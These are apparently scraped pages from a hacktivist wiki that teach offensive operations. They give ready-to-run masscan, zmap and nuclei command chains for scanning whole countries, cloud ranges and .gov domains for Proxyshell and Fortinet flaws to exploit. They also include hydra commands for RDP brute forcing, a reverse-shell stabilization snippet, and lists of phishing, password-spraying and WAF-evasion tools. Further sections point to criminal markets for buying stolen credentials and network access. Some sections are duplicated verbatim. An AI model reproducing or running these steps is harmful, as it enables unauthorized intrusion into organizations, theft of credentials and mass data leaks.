# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].

=== Networks ===
==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

'''IP Ranges''':
* List all IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* IP Address Ranges by Country: https://lite.ip2location.com/ip-address-ranges-by-country ([https://github.com/ip2location/ip2location-python-csv-converter parse output])
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0

===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]

'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>

* <code>sed -i 's/$/:443/' results.txt</code>

*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>

Exploit Discovered hosts: [[Proxyshell]]

===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]

'''Tool''': [https://github.com/zmap/zmap zmap]

'''1.''' Scan for Microsoft Exchange E-mail Servers:
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>

[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]

===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See [[Domain Spray and Pray]] scanning.

==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.

===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>

===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt></code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

Hacking Linux

2024-03-21T12:40:41Z

Booda: /* Tools */

== Rooting ==
These tools will quickly help you analyze a system for vulnerabilities that will aid in your privilege escalation and maintaining persistence.

=== Tools ===
* LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
* LinEnum: https://github.com/rebootuser/LinEnum
* LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
* Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
* Linux Priv Checker: https://github.com/linted/linuxprivchecker
* Nix* binary exploitation: https://gtfobins.github.io
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md Linux - Privilege Escalation]
* SSH-Snake is a self-propagating, self-replicating, file-less script that automates the post-exploitation task of SSH private key and host discovery: https://github.com/MegaManSec/SSH-Snake

== Stabilizing Shells ==
After gaining a [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md reverse shell] it's good practice to stabilize it for better usability and functionality.
<pre>
python3 -c 'import pty;pty.spawn("/bin/bash");'
stty -a
stty rows <NUMBER> cols <NUMBER>
echo $SHELL
export SHELL=bash
echo $TERM
export TERM=xterm-256color
press CTRL+Z
stty raw -echo ; fg
reset
</pre>

== Evade Detection ==
For evading detection whilst you're hacking:

See [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Evasion.md Linux - Evasion].

== Linux Persistence ==
For persisting your access on a Linux system:

See [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md Linux - Persistence].

General tips and tricks:
* Tips, Tricks & Hacks Cheat Sheet: https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet

Domain Spray and Pray

2024-03-21T11:38:36Z

Booda:

To get a list of government domains (as an example) you can either masscan the internet using [https://github.com/zmap/zmap zmap] for port 443 and then proceed to grab banners and certificates using [https://github.com/zmap/zgrab2 zgrab] and then grep for <code>.gov</code> TLDs or you can [https://kaeferjaeger.gay/?dir=sni-ip-ranges download a list of domains] from popular cloud providers (limiting) such as Amazon, Digital Ocean, Google, Microsoft and Oracle.

'''NOTE:''' This is very loud and not recommended. However for large scale hacktivist operations where the operation seeks to target as much as possible in regards to specific TLDs or countries this method works quite well in regards to identifying low hanging fruit vulnerabilities. A more targeted penetration test against a target list will be much better and more effective.

=== Mass Scanning ===
If you don't want to limit your scan by cloud providers and you want to get more coverage for domains you can use both [https://github.com/zmap/zmap zmap] and [https://github.com/zmap/zgrab2 zgrab] to port scan and download SSL/TLS certificate data to then grep for domains. A lot of organizations suffer from shadow IT and dont have great insights into the assets they own and are exposed. We can exploit this with mass spray and pray campaigns.

==== Zmap ====
Scan the internets IPV4 space for port 443:
* <code>sudo [https://github.com/zmap/zmap zmap] -p 443 -o targets.txt</code>

==== Zgrab ====
Using zmaps output as input now download the certificate data:
* <code>[https://github.com/zmap/zgrab2 zgrab2] tls --input-file=targets.txt --output-file=certs.json</code>

After which you will want to parse the output for government top level domains ([https://en.wikipedia.org/wiki/List_of_Internet_top-level_domains or other]):
* <code>grep -E -o '[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+(\.[a-zA-Z]{2,})' certs.json > domains.txt</code>
** <code>grep -i '\.gov$' domains.txt > gov_domains.txt</code>

=== Cloud Domains ===
To begin, download all of the cloud providers text files and parse them.

* https://kaeferjaeger.gay/?dir=sni-ip-ranges

Output all cloud provider text files into one big file:
* <code>user@host:~/sni_ip_ranges$ cat *.txt > all.txt</code>

Parse all.txt for domains:
* <code>grep -E -o '[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+(\.[a-zA-Z]{2,})' ~/sni_ip_ranges/all.txt > domains.txt</code>

Grep specifically for your targets TLDs:
* <code>grep -i '\.gov$' domains.txt > gov_domains.txt</code>

=== Enumerate Subdomains ===
To be thorough in our scanning we will enumerate all the domains in the domains.txt file for their subdomains to ensure complete coverage (nuclei will filter duplicates).

* <code>[https://github.com/projectdiscovery/subfinder subfinder] -dL gov_domains.txt -o government_domains.txt</code>

=== Port scan ===
To ensure a thorough vulnerability scan we will want to port scan our targets for their open ports to ensure we scan all their services.

* <code>[https://github.com/projectdiscovery/naabu naabu] -l government_domains.txt -o government_domains_final.txt</code>

=== Vulnerability Scan ===
Finally we vulnerability scan the targeted domains to later exploit.

* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l government_domains_final.txt -s critical,high -o vuln_gov_domains.txt</code>

Initial Access Tactics, techniques and procedures

2023-10-22T10:34:54Z

Booda: /* Vulnerability Scanning */

== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious email attachment or click on a malicious link.

==== Tools ====
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office

== Password Attacks ==
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.

=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and emails for password spraying.

* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/sc0tfree/mentalist
* https://github.com/urbanadventurer/username-anarchy
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/shroudri/username_generator

=== Passwords ===
Common and leaked credentials to test login portals and network services.

==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet

==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

=== Password cracking tools ===

* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://github.com/1N3/BruteX

=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]

==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

* https://haveibeenpwned.com
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]

Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, email:pass.

=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.

* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/knavesec/CredMaster
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper

=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!

==== Identify hash ====
* https://github.com/blackploit/hash-identifier

==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net

==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules

== Buying access ==

You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.
* http://genesis7zoveavupiiwnrycmaq6uro3kn5h2be3el7wdnbjti2ln2wid.onion/guest/login [Paid]

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])

== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.

=== Prerequisites ===
There are some prerequisites you will need to follow the below examples:
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].

=== Networks ===
==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

'''IP Ranges''':
* List all IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* IP Address Ranges by Country: https://lite.ip2location.com/ip-address-ranges-by-country ([https://github.com/ip2location/ip2location-python-csv-converter parse output])
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0

===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]

'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>

* <code>sed -i 's/$/:443/' results.txt</code>

*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>

Exploit Discovered hosts: [[Proxyshell]]

===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]

'''Tool''': [https://github.com/zmap/zmap zmap]

'''1.''' Scan for Microsoft Exchange Email Servers:
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>

[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]

===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See [[Domain Spray and Pray]] scanning.

==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.

===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt></code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>

===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt></code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

Reverse Engineering

2023-10-16T08:57:17Z

Booda:

'''NOTE:''' This page is under construction

* https://github.com/NationalSecurityAgency/ghidra
* https://www.hex-rays.com/products/ida/index.shtml [Paid]
* https://github.com/AFLplusplus/AFLplusplus
* https://www.gnu.org/software/gdb
* https://github.com/x64dbg/x64dbg
* https://gchq.github.io/CyberChef

Scanning and Recon

2023-10-16T08:41:41Z

Booda: /* Reconnaissance */

These tools will scan web applications for vulnerabilities and misconfigurations, remember that they will cause a lot of traffic making lots of requests. Using APIs will advance your scanning but may cost $$$.

'''NOTE: This is not an exhaustive list.'''

=== WAF detect ===
Your target may have a web application firewall (WAF) which might try to prevent scanning, exploitation and other security tests. It's important that we can identify what WAF is in place so we can try and bypass it. Some targets might be vulnerable and normally an exploit would work however the WAF is preventing the exploit from popping the box. You can try to encode the payload ([https://portswigger.net/burp/documentation/desktop/tools/decoder Burpsuite is good for this]) amongst other things to bypass the WAF.

* Blog: https://labs.detectify.com/2022/05/09/discovering-the-origin-host-to-bypass-waf
* Blog: https://blog.yeswehack.com/yeswerhackers/web-application-firewall-bypass
* Identify and fingerprint web application firewalls: https://github.com/EnableSecurity/wafw00f
* Detect and bypass web application firewalls: https://github.com/Ekultek/WhatWaf
* Everything about web application firewalls (educational): https://github.com/0xInfection/Awesome-WAF
* Nuclei template to detect WAFs: https://github.com/projectdiscovery/nuclei-templates/blob/master/technologies/waf-detect.yaml
* Detect WAFs using: <code>asnmap -org paypal -silent | dnsx -ptr -ro -silent | cdncheck -resp -silent</code>

=== Reconnaissance ===
Automated recon scripts which automates a lot of the boring aspects of recon for you. They can be used to run some cursory automated vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers. Also can perform passive and active recon testing such as subdomain enumeration, credential bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records and directory fuzzing, dorking, ports scanning, screenshots, nuclei scanning on your targets and more. The best one is [https://github.com/six2dez/reconftw reconFTW] but we provide others for comparison.

* https://github.com/six2dez/reconftw | [https://gist.github.com/jhaddix/141d9cb07ca0590dbc43389e0e4af98f Free scan config (no API)]
* https://github.com/Tib3rius/AutoRecon
* https://github.com/AdmiralGaust/bountyRecon
* https://github.com/offhourscoding/recon
* https://github.com/Sambal0x/Recon-tools
* https://github.com/yourbuddy25/Hunter
* https://github.com/venom26/recon/blob/master/ultimate_recon.sh
* https://gist.github.com/dwisiswant0/5f647e3d406b5e984e6d69d3538968cd
* https://github.com/capt-meelo/LazyRecon
* https://github.com/phspade/Automated-Scanner
* https://github.com/shmilylty/OneForAll
* https://github.com/SolomonSklash/chomp-scan
* https://github.com/Screetsec/Sudomy
* https://github.com/Edu4rdSHL/findomain
* https://github.com/SilverPoision/Rock-ON
* https://github.com/epi052/recon-pipeline

=== Vulnerability scanners ===
To quickly cover a lot of ground it's a good idea to scan your target using vulnerability scanners as they might be able to discover a vulnerability or misconfiguration that you can't find. To avoid WAFs make sure to use a list of random user-agent strings and a residential proxy list if possible and maybe encode some payloads.

* Axiom distributes the load of your scanning tools across multiple servers. https://github.com/pry0cc/axiom | [https://twitter.com/Jhaddix/status/1633936278222962688?cxt=HHwWgIDUkeuY9KwtAAAA Twitter Thread]
* Nuclei scanner: https://github.com/projectdiscovery/nuclei | [https://blog.projectdiscovery.io/ultimate-nuclei-guide The Ultimate Guide to Finding Bugs With Nuclei]
** WordPress related Nuclei templates: https://github.com/topscoder/nuclei-wordfence-cve
* Use Osmedeus to build your own reconnaissance system (Great for scanning large amount of target hosts): https://github.com/osmedeus/osmedeus-base [Free and Paid]
* CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs: https://github.com/Tuhinshubhra/CMSeeK
* The Swiss Army knife for automated Web Application Testing: https://github.com/jaeles-project/jaeles | [https://jaeles-project.github.io Jaeles Scanner]
* Attack Surface Management Platform, used to discover hidden assets and vulnerabilities: https://github.com/1N3/Sn1per
* Enumerate subdomains and vulnerability scan them: <code>[https://github.com/projectdiscovery/subfinder subfinder] -d nasa.gov -silent | httpx -silent | nuclei -silent -s critical,high,medium,low -o vulns.txt</code>
* Wordpress CMS specific vulnerability scanner, version detection, plugin enumeration and user account bruteforce tool: https://github.com/wpscanteam/wpscan | [https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation WPScan Documentation] [Free and paid]
* Joomla CMS specific vulnerability scanner: https://github.com/OWASP/joomscan
* Drupal CMS specific vulnerability scanner: https://github.com/immunIT/drupwn
* Watch [https://www.youtube.com/watch?v=kCLDqvDnGzA Catalan police union hack] to learn how to utilize ZAP to discover vulnerabilities: https://www.zaproxy.org
* Pyfiscan is a web-application vulnerability and version scanner which can be used to locate out-dated versions of common web-applications: https://github.com/fgeek/pyfiscan
* User-Agent , X-Forwarded-For and Referer SQLI Fuzzer: https://github.com/root-tanishq/userefuzz
* Nmap Scripting Engine (NSE) can be used to perform version detection, network discovery and vulnerability scan/exploitation: https://nmap.org/book/man-nse.html | [https://nmap.org/book/nse.html Nmap Scripting Engine] | [https://github.com/nmap/nmap/tree/master/scripts Scripts]
* Scan for SQLi/XSS/LFI/RFI and other common vulnerabilities: https://github.com/v3n0m-Scanner/V3n0M-Scanner
* Quickly discover the attack surface, and identify vulnerabilities: https://github.com/yogeshojha/rengine
* XSS specific scanner and utility focused on automation: https://github.com/hahwul/dalfox
* high-performance vulnerability scanner! Supports user-defined PoC and comes with several built-in types, such as CVE, CNVD, default passwords, information disclosure, fingerprint identification, unauthorized access, arbitrary file reading, and command execution: https://github.com/zan8in/afrog

=== Subdomain enumeration ===
Enumerate your targets top level domain (TLD) as part of your recon to identify entry points in your targets infrastructure. Pay special attention to interesting subdomains such as test, dev, backup, etc. Your targets subdomains may also be running out of date software, subdomains might not be behind a WAF where the main page will be, less or no authentication where there should be and more vulnerabilities may exist as opposed to the TLD.

* https://github.com/OWASP/Amass
* https://github.com/aboul3la/Sublist3r
* You can also try using [https://github.com/six2dez/reconftw reconftw] for a more comprehensive subdomain enumeration, using different tools and techniques. <code>./reconftw.sh -d nasa.gov -s</code>
* https://github.com/projectdiscovery/subfinder
* Subdomain enumeration dork: <code>[https://www.google.com/search?q=site:.nasa.gov site:.nasa.gov]</code>
* https://github.com/projectdiscovery/shuffledns
* https://github.com/projectdiscovery/dnsx
* https://github.com/infosec-au/altdns
* https://github.com/resyncgg/ripgen

==== Subdomain screenshot ====
Screenshot subdomains during your recon process to quickly sift through and identify different subdomains without needing to load each one
* gowitness - a golang, web screenshot utility using Chrome Headless: https://github.com/sensepost/gowitness
* <code>httpx -l subdomains.txt -screenshot</code> | https://github.com/projectdiscovery/httpx
* EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible: https://github.com/RedSiege/EyeWitness

==== Subdomain takeover ====
A subdomain takeover allows us to gain control over a misconfigured or abandoned subdomain. This is done by exploiting vulnerabilities in DNS settings, expired or deleted services, or incomplete migrations. Once control is established, we can employ social engineering tactics such as phishing, this could be hosting phishing pages on legitimate company subdomains that are already trusted by employees.

